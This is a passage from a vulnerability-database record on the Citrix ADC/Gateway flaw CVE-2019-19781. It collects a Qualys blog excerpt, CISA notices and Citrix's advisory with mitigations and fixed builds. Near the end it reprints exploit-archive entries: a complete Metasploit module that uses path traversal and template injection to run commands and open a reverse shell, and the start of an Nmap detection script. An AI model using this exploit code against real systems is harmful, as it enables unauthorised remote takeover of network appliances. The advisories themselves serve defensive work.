helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [&quot;NSA&#x27;s Top 25 Vulnerabilities from China&quot; dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "modified": "2020-10-22T23:10:29", "published": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. Citrix plans to begin releasing security updates for affected software starting January 20, 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:\n\n * Review the Citrix article on [updates on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/>), published January 17, 2020;\n * See Citrix Security Bulletin [CTX267027 \u2013 Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027>);\n * Apply the recommended mitigations in [CTX267679 \u2013 Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>); and\n * Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781>); we'd welcome your feedback.\n", "modified": "2020-01-17T00:00:00", "published": "2020-01-17T00:00:00", "id": "CISA:134C272F26FB005321448C648224EB02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781", "type": "cisa", "title": "Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:54", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released a [utility](<https://github.com/cisagov/check-cve-2019-19781>) that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability. According to Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>), beginning on January 20, 2020, Citrix will be releasing new versions of Citrix ADC and Citrix Gateway that will patch CVE-2019-19781.\n\nCISA strongly advises affected organizations to review CERT/CC\u2019s Vulnerability Note [VU#619785](<https://www.kb.cert.org/vuls/id/619785/>) and Citrix Security Bulletin [CTX267027 ](<https://support.citrix.com/article/CTX267027>)and apply the mitigations until Citrix releases new versions of the software.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>); we'd welcome your feedback.\n", "modified": "2020-01-13T00:00:00", "published": "2020-01-13T00:00:00", "id": "CISA:661993843C9F9A838ADA8B8B8B9412D1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability", "type": "cisa", "title": "CISA Releases Test for Citrix ADC and Gateway Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:50", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "Citrix has released security updates to address the CVE-2019-19781 vulnerability in Citrix SD-WAN WANOP. An attacker could exploit this vulnerability to take control of an affected system. Citrix has also released an Indicators of Compromise Scanner that aims to identify evidence of successful exploitation of CVE-2019-19781.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends users and administrators review the Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>) and apply the necessary updates. CISA also recommends users and administrators:\n\n * Run the [Indicators of Compromise Scanner](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>);\n * Review the Citrix article on [CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>), published January 23, 2020; and\n * Review CISA\u2019s Activity Alert on [Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://www.us-cert.gov/ncas/alerts/aa20-020a>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop>); we'd welcome your feedback.\n", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop", "type": "cisa", "title": "Citrix Releases Security Updates for SD-WAN WANOP", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T18:06:53", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "CISA, the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) have released a [Joint Cybersecurity Advisory (CSA)](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) on Russian Foreign Intelligence Service (SVR) actors scanning for and exploiting vulnerabilities to compromise U.S. and allied networks, including national security and government-related systems.\n\nSpecifically, SVR actors are targeting and exploiting the following vulnerabilities:\n\n * [CVE-2018-13379 Fortinet FortiGate VPN](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [CVE-2019-9670 Synacor Zimbra Collaboration Suite](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>)\n * [CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CVE-2019-19781 Citrix Application Delivery Controller and Gateway](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [CVE-2020-4006 VMware Workspace ONE Access](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>)\n\nAdditionally the White House has released a [statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) formally attributing this activity and the SolarWinds supply chain compromise to SVR actors. CISA has updated the following products to reflect this attribution:\n\n * [Alert AA20-352A: APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * [Alert AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool](<https://us-cert.cisa.gov/ncas/alerts/aa21-077a>)\n * [Malware Analysis Report AR21-039A: MAR-10318845-1.v1 - SUNBURST](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a>)\n * [Malware Analysis Report AR21-039B: MAR-10320115-1.v1 - TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>)\n * Table: SolarWinds and Active Directory/M365 Compromise - Detecting APT Activity from Known TTPs\n * [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise web page](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * [Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise](<https://cyber.dhs.gov/ed/21-01/>)\n\nCISA strongly encourages users and administrators to review [Joint CSA: Russian SVR Targets U.S. and Allied Networks](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) for SVR tactics, techniques, and procedures, as well as mitigation strategies.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied>); we'd welcome your feedback.\n", "modified": "2021-04-16T00:00:00", "published": "2021-04-15T00:00:00", "id": "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied", "type": "cisa", "title": "NSA-CISA-FBI Joint Advisory on Russian SVR Targeting U.S. and Allied Networks", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "citrix": [{"lastseen": "2021-04-26T12:31:23", "bulletinFamily": "software", "cvelist": ["CVE-2019-19781"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div> <div> <!--googleoff: all--> <h2 id=\"DescriptionofProblem\"> Description of Problem</h2> <!--googleon: all--> <div> <div> <div> <p id=\"cq-gen416\">A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.</p> <p id=\"cq-gen417\">The scope of this vulnerability includes Citrix ADC and Citrix Gateway Virtual Appliances (VPX) hosted on any of Citrix Hypervisor (formerly XenServer), ESX, Hyper-V, KVM, Azure, AWS, GCP, Citrix ADC MPX or Citrix ADC SDX.</p> <p id=\"cq-gen418\">Further investigation by Citrix has shown that this issue also affects certain deployments of Citrix SD-WAN, specifically Citrix SD-WAN WANOP edition. Citrix SD-WAN WANOP edition packages Citrix ADC as a load balancer thus resulting in the affected status.</p> <p id=\"cq-gen419\">The vulnerability has been assigned the following CVE number:</p> <p id=\"cq-gen420\">\u2022 CVE-2019-19781 : Vulnerability in Citrix Application Delivery Controller, Citrix Gateway and Citrix SD-WAN WANOP appliance leading to arbitrary code execution</p> <p id=\"cq-gen421\">The vulnerability affects the following supported product versions on all supported platforms:</p> <p id=\"cq-gen422\">\u2022 Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24</p> <p id=\"cq-gen423\">\u2022 NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18</p> <p id=\"cq-gen424\">\u2022 NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13</p> <p id=\"cq-gen425\">\u2022 NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15</p> <p id=\"cq-gen426\">\u2022 NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12</p> <p id=\"cq-gen427\">\u2022 Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b</p> </div> </div> </div> <!--googleoff: all--> <hr/> </div> <div> <!--googleoff: all--> <h2 id=\"WhatCustomersShouldDo\"> What Customers Should Do</h2> <!--googleon: all--> <div> <div> <div> <p id=\"cq-gen757\">Exploits of this issue on unmitigated appliances have been observed in the wild. Citrix strongly urges affected customers to immediately upgrade to a fixed build OR apply the provided mitigation which applies equally to Citrix ADC, Citrix Gateway and Citrix SD-WAN WANOP deployments. Customers who have chosen to immediately apply the mitigation should then upgrade all of their vulnerable appliances to a fixed build of the appliance at their earliest schedule. Subscribe to bulletin alerts at <a href=\"https://support.citrix.com/user/alerts\">https://support.citrix.com/user/alerts</a> to be notified when the new fixes are available.</p> <p id=\"cq-gen477\">The following knowledge base article contains the steps to deploy a responder policy to mitigate the issue in the interim until the system has been updated to a fixed build: <a href=\"https://support.citrix.com/article/CTX267679\">CTX267679 - Mitigation steps for CVE-2019-19781</a></p> <p id=\"cq-gen758\" style=\"display: none;\">The following knowledge base article contains the steps to deploy a responder policy to mitigate the issue in the interim until a permanent fix is available: <a href=\"https://support.citrix.com/article/CTX267679\">CTX267679 - Mitigation steps for CVE-2019-19781</a></p> <p id=\"cq-gen469\">Upon application of the mitigation steps, customers may then verify correctness using the tool published here: <a href=\"https://support.citrix.com/article/CTX269180\" target=\"_blank\">CTX269180 - CVE-2019-19781 \u2013 Verification Tool</a></p> <p id=\"cq-gen772\"> <i>In Citrix ADC and Citrix Gateway Release \"12.1 build 50.28\", an issue exists that affects responder and rewrite policies causing them not to process the packets that matched policy rules. This issue was resolved in \"12.1 build 50.28/31\" after which the mitigation steps, if applied, will be effective. However, Citrix recommends that customers using these builds now update to \"12.1 build 55.18\", or later, where CVE-2019-19781 issue is already addressed.</i></p> <p> <i>Customers on \"12.1 build 50.28\" who wish to defer updating to \"12.1 build 55.18\" or later should choose one from the following two options for the mitigation steps to function as intended:</i></p> <p> <i>1. Update to the refreshed \"12.1 build 50.28/50.31\" or later and apply the mitigation steps, OR<br/> </i></p> <p id=\"cq-gen478\"> <i>2. Apply the mitigation steps towards protecting the management interface as published in CTX267679. This will mitigate attacks, not just on the management interface but on ALL interfaces including Gateway and AAA virtual IPs</i></p> <p id=\"cq-gen773\"> <b>Fixed builds have been released across all supported versions of Citrix ADC and Citrix Gateway. Fixed builds have also been released for Citrix SD-WAN WANOP for the applicable appliance models. Citrix strongly recommends that customers install these updates at their earliest schedule. The fixed builds can be downloaded from <a href=\"https://www.citrix.com/downloads/citrix-adc/\">https://www.citrix.com/downloads/citrix-adc/</a> and <a href=\"https://www.citrix.com/downloads/citrix-gateway/\">https://www.citrix.com/downloads/citrix-gateway/</a> and <a href=\"https://www.citrix.com/downloads/citrix-sd-wan/\">https://www.citrix.com/downloads/citrix-sd-wan/</a></b></p> <p id=\"cq-gen479\"> <b> <a href=\"https://www.citrix.com/downloads/citrix-sd-wan/\"></a></b> <br/> Customers who have upgraded to fixed builds do not need to retain the mitigation described in CTX267679.</p> <p id=\"cq-gen774\"> </p> </div> </div> </div> <!--googleoff: all--> <hr/> </div> <div> <!--googleoff: all--> <h2 id=\"FixTimelines\"> Fix Timelines</h2> <!--googleon: all--> <div> <div> <div> <p id=\"cq-gen392\">Citrix has released fixes in the form of refresh builds across all supported versions of Citrix ADC, Citrix Gateway, and applicable appliance models of Citrix SD-WAN WANOP. Please refer to the table below for the release dates.</p> </div> <div> <table border=\"1\" cellpadding=\"1\" cellspacing=\"0\" width=\"100%\"> <tbody> <tr> <th colspan=\"3\"><span style=\"font-weight: 400;\">Citrix ADC and Citrix Gateway</span></th> </tr> <tr> <td style=\"text-align: center;\">Version</td> <td style=\"text-align: center;\">Refresh Build</td> <td style=\"text-align: center;\">Release Date</td> </tr> <tr> <td>10.5</td> <td>10.5.70.12</td> <td>24th January 2020 (Released)</td> </tr> <tr> <td>11.1</td> <td>11.1.63.15</td> <td>19th January 2020 (Released)</td> </tr> <tr> <td>12.0</td> <td>12.0.63.13</td> <td>19th January 2020 (Released)</td> </tr> <tr> <td>12.1</td> <td>12.1.55.18</td> <td>23rd January 2020 (Released)</td> </tr> <tr> <td>13.0</td> <td>13.0.47.24</td> <td>23rd January 2020 (Released)</td> </tr> <tr> <th colspan=\"3\"><span style=\"font-weight: 400;\">Citrix SD-WAN WANOP </span></th> </tr> <tr> <td style=\"text-align: center;\">Release</td> <td style=\"text-align: center;\">Citrix ADC Release</td> <td style=\"text-align: center;\">Release Date</td> </tr> <tr> <td>10.2.6b</td> <td>11.1.51.615</td> <td>22nd January 2020 (Released)</td> </tr> <tr> <td>11.0.3b</td> <td>11.1.51.615</td> <td>22nd January 2020 (Released)</td> </tr> </tbody> </table> </div> </div> </div> <!--googleoff: all--> <hr/> </div> <div> <!--googleoff: all--> <h2 id=\"Acknowledgements\"> Acknowledgements</h2> <!--googleon: all--> <div> <div> <div> <p>Citrix thanks Gianlorenzo Cipparrone and Miguel Gonzalez of Paddy Power Betfair plc for working with us to protect Citrix customers.</p> </div> </div> </div> <!--googleoff: all--> <hr/> </div> <div> <!--googleoff: all--> <h2 id=\"WhatCitrixIsDoing\"> What Citrix Is Doing</h2> <!--googleon: all--> <div> <div> <div> <div> <div> <p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p> </div> </div> </div> </div> </div> <!--googleoff: all--> <hr/> </div> <div> <!--googleoff: all--> <h2 id=\"ObtainingSupportonThisIssue\"> Obtaining Support on This Issue</h2> <!--googleon: all--> <div> <div> <div> <div> <div> <p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p> </div> </div> </div> </div> </div> <!--googleoff: all--> <hr/> </div> <div> <!--googleoff: all--> <h2 id=\"ReportingSecurityVulnerabilities\"> Reporting Security Vulnerabilities</h2> <!--googleon: all--> <div> <div> <div> <div> <div> <p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p> </div> </div> </div> </div> </div> <!--googleoff: all--> <hr/> </div> <div> <!--googleoff: all--> <h2 id=\"Changelog\"> Changelog</h2> <!--googleon: all--> <div> <div> <div> <table border=\"1\" cellpadding=\"1\" cellspacing=\"0\" width=\"100%\"> <tbody> <tr> <td>Date </td> <td>Change</td> </tr> <tr> <td>17th December 2019</td> <td>Initial Publication</td> </tr> <tr> <td>11th January 2020</td> <td>Fix Timelines Updated</td> </tr> <tr> <td>16th January 2020</td> <td>SD-WAN WANOP added/Citrix ADC 12.1 responder bug detail added</td> </tr> <tr> <td>16th January 2020</td> <td>CVE verification tool</td> </tr> <tr> <td>17th January 2020</td> <td>Update to Citrix ADC and Citrix Gateway 12.1 responder policy issue</td> </tr> <tr> <td>19th January 2020</td> <td>Announced release of 12.0 and 11.1 builds. Announced earlier release dates for other versions.</td> </tr> <tr> <td>22nd January 2020</td> <td>Announced fixes for SD-WAN WANOP appliances</td> </tr> <tr> <td>23rd January 2020</td> <td>Announced (accelerated) release of 13.0 and 12.1 builds.</td> </tr> <tr> <td>24th January 2020</td> <td>Announced release of 10.5 build</td> </tr> <tr> <td>23rd October 2020</td> <td>Added explicit statement clarifying that MPX is affected</td> </tr> </tbody> </table> </div> </div> </div> <!--googleoff: all--> <hr/> </div> </div></div>\n</section>", "modified": "2020-10-23T04:00:00", "published": "2019-12-17T05:00:00", "id": "CTX267027", "href": "https://support.citrix.com/article/CTX267027", "type": "citrix", "title": "CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-01-19T23:04:26", "description": "Exploit for multiple platform in category web applications", "edition": 1, "published": "2020-01-13T00:00:00", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "1337DAY-ID-33806", "href": "https://0day.today/exploit/description/33806", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC Remote Code Execution',\r\n 'Description' => %q(\r\n An issue was discovered in Citrix Application Delivery Controller (ADC)\r\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\r\n ),\r\n 'Author' => [\r\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-19781'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\r\n ['EDB', '47901'],\r\n ['EDB', '47902']\r\n ],\r\n 'DisclosureDate' => '2019-12-17',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl meterpreter'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Unix (remote shell)',\r\n 'Type' => :cmd_shell,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (command-line)',\r\n 'Type' => :cmd_generic,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptAddress.new('RHOST', [true, 'The target address'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n\r\n deregister_options('RHOSTS')\r\n end\r\n\r\n def execute_command(command, opts = {})\r\n filename = Rex::Text.rand_text_alpha(16)\r\n nonce = Rex::Text.rand_text_alpha(6)\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\r\n 'headers' => {\r\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\r\n 'NSC_NONCE' => nonce\r\n },\r\n 'vars_post' => {\r\n 'url' => 'http://127.0.0.1',\r\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\r\n 'desc' => 'desc',\r\n 'UI_inuse' => 'RfWeb'\r\n },\r\n 'encode_params' => false\r\n }\r\n\r\n begin\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n\r\n if received.code == 200\r\n vprint_status(\"#{received.get_html_document.text}\")\r\n sleep 2\r\n\r\n request = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\r\n 'headers' => {\r\n 'NSC_USER' => nonce,\r\n 'NSC_NONCE' => nonce\r\n }\r\n }\r\n\r\n ## Trigger to gain exploitation.\r\n begin\r\n send_request_cgi(request)\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n return received\r\n end\r\n\r\n return false\r\n end\r\n\r\n def get_chr_payload(command)\r\n chr_payload = command\r\n i = chr_payload.length\r\n\r\n output = \"\"\r\n chr_payload.each_char do | c |\r\n i = i - 1\r\n output << \"chr(\" << c.ord.to_s << \")\"\r\n if i != 0\r\n output << \" . \"\r\n end\r\n end\r\n\r\n return output\r\n end\r\n\r\n def check\r\n begin\r\n received = send_request_cgi(\r\n \"method\" => \"GET\",\r\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\r\n )\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n\r\n if received && received.code != 200\r\n return Exploit::CheckCode::Safe\r\n end\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n unless check.eql? Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n else\r\n print_good('The target appears to be vulnerable.')\r\n end\r\n\r\n case target['Type']\r\n when :cmd_generic\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n received = execute_command(payload.encoded)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\r\n print_warning('Dumping command output in parsed http response')\r\n print_good(\"#{received.get_html_document.text}\")\r\n else\r\n print_warning('Empty response, no command output')\r\n return\r\n end\r\n\r\n when :cmd_shell\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n execute_command(payload.encoded)\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33806"}, {"lastseen": "2020-01-19T23:02:20", "description": "Exploit for multiple platform in category web applications", "edition": 1, "published": "2020-01-16T00:00:00", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "1337DAY-ID-33824", "href": "https://0day.today/exploit/description/33824", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 